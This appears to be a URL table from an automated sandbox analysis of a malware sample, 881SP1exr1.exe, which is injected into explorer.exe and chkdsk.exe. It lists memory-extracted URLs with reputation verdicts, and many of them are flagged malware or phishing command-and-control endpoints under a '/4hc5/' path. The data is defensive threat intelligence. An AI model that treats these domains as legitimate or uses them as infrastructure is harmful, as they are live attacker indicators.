http://www.bollywood.nexusReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.lpqxmz.site/4hc5/www.tcbbuilds.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://excel.office.com	explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.showshoe.info/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/us/a-nationwide-emergency-alert-will-be-sent-to-all-u-s-cellphones-we	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.bollywood.nexus/4hc5/www.lpqxmz.site	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.sajatypeworks.com	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.modluxenwa.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.motionmixmedia.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cn/cThe	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://domshow.vhostgo.com/template/img/paimai/banner_jiaoyi.jpg)	explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.7141999.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.slotjitu88.website	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
http://www.7141999.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu-dark	explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.candicrem.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.motionmixmedia.com/4hc5/www.castlegrouplt.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.galapagosdesign.com/DPlease	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.iqixuehe.com/4hc5/www.candicrem.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.lpqxmz.siteReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.modluxenwa.com/4hc5/www.vurporn.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.showshoe.infoReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppcrobat.exe	explorer.exe, 00000003.00000000.1656205865.000000000C893000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C893000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.urwpp.deDPlease	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.pacersun.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.zhongyicts.com.cn	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.therealnikib.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.therealnikib.com/4hc5/www.slotjitu88.website	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.therenixgroupllc.com/4hc5/www.7141999.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/AAehR3S.svg	explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000003.3105919399.000000000C9AE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105163433.000000000C999000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C964000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105077677.000000000C970000.00000004.00000001.00020000.00000000.sdmp	false		high
https://wns.windows.com/L	explorer.exe, 00000003.00000000.1656205865.000000000C557000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4099182802.000000000C557000.00000004.00000001.00020000.00000000.sdmp	false		high
https://word.office.com	explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.castlegrouplt.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gHZu	explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.vurporn.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/weather/topstories/us-weather-super-el-nino-to-bring-more-flooding-and-win	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://domshow.vhostgo.com/template/img/paimai/jiaoyixq_jiaoyi.jpg)	explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	false		high
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/politics/clarence-thomas-in-spotlight-as-supreme-court-delivers-blow-	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.vurporn.com/4hc5/www.motionmixmedia.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.carterandcone.coml	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/frere-user.html	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gTUY-dark	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.rd.com/list/polite-habits-campers-dislike/	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.pacersun.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.motionmixmedia.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://img.sedoparking.com/templates/images/hero_nc.svg	explorer.exe, 00000003.00000002.4103832201.000000001177F000.00000004.80000000.00040000.00000000.sdmp, chkdsk.exe, 00000004.00000002.4090864784.000000000630F000.00000004.10000000.00040000.00000000.sdmp	false		high
http://www.lpqxmz.site	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://img.s-msn.com/tenant/amp/entityid/AAbC0oi.img	explorer.exe, 00000003.00000000.1648506599.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.4092507766.00000000078AD000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.therenixgroupllc.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com_	explorer.exe, 00000003.00000002.4099182802.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1656205865.000000000C5AA000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	low
http://www.7141999.com/4hc5/www.pacersun.com	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.rd.com/newsletter/?int_source=direct&int_medium=rd.com&int_campaign=nlrda_20221001_toppe	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/world/agostini-krausz-and-l-huillier-win-physics-nobel-for-looking-at	explorer.exe, 00000003.00000002.4092507766.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1648506599.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designersG	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.pacersun.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.modluxenwa.com/4hc5/	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.tcbbuilds.comReferer:	explorer.exe, 00000003.00000002.4101949894.000000000CAAA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105645174.000000000CAA7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3104949466.000000000CA7C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105948016.000000000CB04000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3105433180.000000000CA93000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3421156816.000000000CB04000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	881SP1exr1.exe, 00000000.00000002.1647168824.0000000007032000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
